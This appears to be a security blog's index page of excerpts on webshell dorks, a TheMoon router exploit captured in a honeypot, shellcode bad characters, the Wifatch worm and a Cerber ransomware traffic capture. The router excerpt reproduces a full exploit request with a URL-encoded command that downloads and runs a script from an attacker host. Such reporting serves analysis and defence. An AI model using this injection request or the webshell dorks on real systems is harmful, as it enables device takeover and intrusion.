Do we need an Internet Policing Force with all power? I can still download malware from a site that was published weeks ago…

Most of the readers here know that I am not a fan of over-policing and abuse of power, etc. However, the internet isn't under any one jurisdiction (although most people think the USA is that). There are a lot more sites out there now than ever scanning and posting malicious sites …

Every Google Dork Webshell C99shell Saudi Shell Huge List Of Searches

powered by captain crunch security team safe-mode: off (not secure) home basel 2.2 safe-mode: off (not secure) drwxrwxrwx c99memoryl c99shell [file on secure ok ] c99shell v. 1.0 pre-release build #16 hacker uid=99(nobody) gid=99(nobody) groups=99(nobody) --[ c99shell v. 1.0 pre-release build #16 basel c99shell v. 1.0 pre-release build powered by captain crunch security team | …

New Linux Backdoor found in the wild TheMoon family of malware ASUS Router NTTPD Vulnerability

New Linux Backdoor found in the wild on one of our honeypots. This bot belongs to the TheMoon family of malware. The vulnerable ASUS router will download and execute the binary file .nttpd from the attacker-controlled website. POST /hndUnblock.cgi HTTP/1.0 \r\nAccept: */*\r\n Host:\r\n User-Agent: Wget(linux)\r\n Content-Length: 414\r\n Content-Type: application/x-www-form-urlencoded submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%66%6C%6F%77%65%72%74%6F%77%65%72%73%62%6C%61%62%6C%61%2E%74%6F%70%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1' …

What is the IEEE? What Standards are Bluetooth, Wireless, Cable, Fiber

IEEE is an acronym for the Institute of Electrical and Electronics Engineers. It is a body of scientists, engineers and students who together are a leading authority in fields such as aerospace, telecommunications, biomedical engineering and electric power. The IEEE consists of more than 365000 members from around the world. The IEEE was formed in 1963 by …

REINCARNA Linux.Wifatch Malware Whitehat Backdoor made by the good guys? How illegal is this?

So last night I did a little banner grabbing from some IP ranges that have been historically extremely insecure. I'm not a blackhat hacker anymore, so my intentions weren't to exploit these hopelessly incompetent victims, but I would have notified them. I have considered the idea of compromising them just to patch them and save …

Writing Shellcode for Buffer Overflows: Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered "bad" and must not appear in your buffer, return address, or shellcode. One common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because …

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE. Example of files that were encrypted and protected: The domain name was NX and not required for the purchase process. 2016-12-16 01:29:05.256362 IP > Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1 E..W..@……..fH……P.n……P…….GET //up1/1/4fv3b5.exe HTTP/1.1 Accept: application/x-shockwave-flash, …

Cyber Security Trends in 2016: Denial of Service and Webshells on the Rise

According to several security research firms, 2015 saw a massive decline in the number of reported malware infections, with exploit activity down 84% compared to 2013. The few active exploit kits worth noting were Angler, Neutrino and Rig, but besides those three there were virtually no other major campaigns detected in …